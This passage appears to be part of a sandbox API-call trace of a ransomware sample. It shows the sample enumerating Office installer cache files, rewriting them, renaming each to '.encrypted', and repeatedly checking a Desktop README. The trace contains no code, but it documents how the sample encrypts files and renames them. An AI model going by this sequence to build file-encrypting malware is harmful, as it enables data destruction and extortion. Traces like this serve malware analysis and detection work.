lpBuffer=0x229e100*, lpNumberOfBytesRead=0x2ee7d4*=0x5aa, lpOverlapped=0x0) returned 1 [0176.271] CloseHandle (hObject=0x2d8) returned 1 [0176.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0176.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0176.286] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0176.286] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0176.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0176.286] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0176.379] GetFileType (hFile=0x2d8) returned 0x1 [0176.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0176.379] GetFileType (hFile=0x2d8) returned 0x1 [0176.380] WriteFile (in: hFile=0x2d8, lpBuffer=0x22ee288*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22ee288*, lpNumberOfBytesWritten=0x2ee798*=0x5b0, lpOverlapped=0x0) returned 1 [0176.380] CloseHandle (hObject=0x2d8) returned 1 [0176.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0176.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.encrypted", lpFilePart=0x0) returned 0x59 [0176.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0176.382] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x4edb0620, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5b0)) returned 1 [0176.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0176.383] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.encrypted")) returned 1 [0176.384] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0176.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0176.384] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0176.384] GetFileType (hFile=0x2d8) returned 0x1 [0176.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0176.384] GetFileType (hFile=0x2d8) returned 0x1 [0176.384] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x97f3f4 [0176.406] ReadFile (in: hFile=0x2d8, lpBuffer=0x1760b2c8, nNumberOfBytesToRead=0x97f3f4, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x1760b2c8*, lpNumberOfBytesRead=0x2ee7d4*=0x97f3f4, lpOverlapped=0x0) returned 1 [0176.640] CloseHandle (hObject=0x2d8) returned 1 [0177.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0177.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0177.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0177.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0177.689] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0177.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0177.689] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0177.695] GetFileType (hFile=0x2d8) returned 0x1 [0177.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0177.695] GetFileType (hFile=0x2d8) returned 0x1 [0177.695] WriteFile (in: hFile=0x2d8, lpBuffer=0x5d1f818*, nNumberOfBytesToWrite=0x97f400, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x5d1f818*, lpNumberOfBytesWritten=0x2ee7c4*=0x97f400, lpOverlapped=0x0) returned 1 [0177.932] CloseHandle (hObject=0x2d8) returned 1 [0178.243] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0178.243] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.encrypted", lpFilePart=0x0) returned 0x52 [0178.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0178.243] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x4ff18700, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x97f400)) returned 1 [0178.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0178.243] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.encrypted")) returned 1 [0178.244] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0178.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0178.245] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0178.245] GetFileType (hFile=0x2d8) returned 0x1 [0178.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0178.245] GetFileType (hFile=0x2d8) returned 0x1 [0178.245] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x648 [0178.245] ReadFile (in: hFile=0x2d8, lpBuffer=0x227b288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x227b288*, lpNumberOfBytesRead=0x2ee7d4*=0x648, lpOverlapped=0x0) returned 1 [0178.247] CloseHandle (hObject=0x2d8) returned 1 [0178.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0178.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0178.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0178.263] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0178.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0178.263] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0178.275] GetFileType (hFile=0x2d8) returned 0x1 [0178.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0178.275] GetFileType (hFile=0x2d8) returned 0x1 [0178.275] WriteFile (in: hFile=0x2d8, lpBuffer=0x22cb380*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22cb380*, lpNumberOfBytesWritten=0x2ee798*=0x650, lpOverlapped=0x0) returned 1 [0178.276] CloseHandle (hObject=0x2d8) returned 1 [0178.277] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0178.277] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0178.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0178.277] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x4ff649c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0178.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0178.278] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0178.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0178.279] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0178.279] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0178.279] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eed30 [0178.281] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.282] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0178.282] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0178.282] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0178.282] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0178.282] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.282] FindClose (in: hFindFile=0x94eed30 | out: hFindFile=0x94eed30) returned 1 [0178.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0178.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0178.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0178.283] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0178.283] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0178.283] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eed30 [0178.285] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.285] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0178.285] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0178.285] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0178.285] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0178.286] FindNextFileW (in: hFindFile=0x94eed30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0178.286] FindClose (in: hFindFile=0x94eed30 | out: hFindFile=0x94eed30) returned 1 [0178.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0178.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0178.287] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0178.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0178.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: 